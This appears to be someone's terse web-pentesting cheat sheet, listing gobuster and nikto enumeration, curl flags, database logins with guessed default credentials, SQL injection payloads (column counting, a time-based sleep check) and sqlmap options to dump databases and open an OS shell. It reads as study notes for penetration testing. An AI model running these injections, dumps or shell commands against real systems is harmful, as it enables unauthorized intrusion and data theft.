💻Web

Enum

Directories and pages

gobuster dir -u $ip -w /usr/share/wordlists/dirb/common.txt -t 5 where -u is url or ip, -w is obviously wordlist, and -t is threads

APIs

gobuster dir -u $ip -w /usr/share/wordlists/dirb/big.txt -p $pattern where -p is a file of gobuster patterns. There's no built in pattern list, so you'll have to make one up as you go, informed by the api calls you see.

{GOBUSTER}/v1
{GOBUSTER}/v2

nikto -h URL is a simple vuln scanner/enum scanner, it's a good place to start for relatively unprotected hosts

Burp Suite

TODO

cURL

curl -i $url -d $data -H $header --proxy $proxy curl to url -u with data -d going through --proxy, note you can have more than one -H

-X "$method" can be used to specify other http methods (GET is the default)

Well Known URLs

Directory Traversal

SQLi

Connection and Recon

Connect to mysql: mysql -u root -p'root' -h $ip -P $p where -u denotes user, -p password, etc.

Some useful commands

Connect to mssql from kali with impacket impacket-mssqlclient Administrator:passw0rd@$ip -windows-auth pretty straightforward, -windows-auth forces NTLM instead of kerberos

Injection

Get number of columns with ' ORDER BY 1-- //

Timing based attack, the idea is that you short circuit if the proceeding thing is true, but I distinctly remember someone saying once that SQL doesn't always short circuit so watch out for that AND IF (1=1, sleep(3),'false') -- //

sqlmap

Use sqlmap -u $url/blindsqli.php?user=1 -p user where -p is the vulnerable parameter. --dump can be added to dump the whole DB, and --os-shell gives us a shell.

Note that sqlmap is super loud.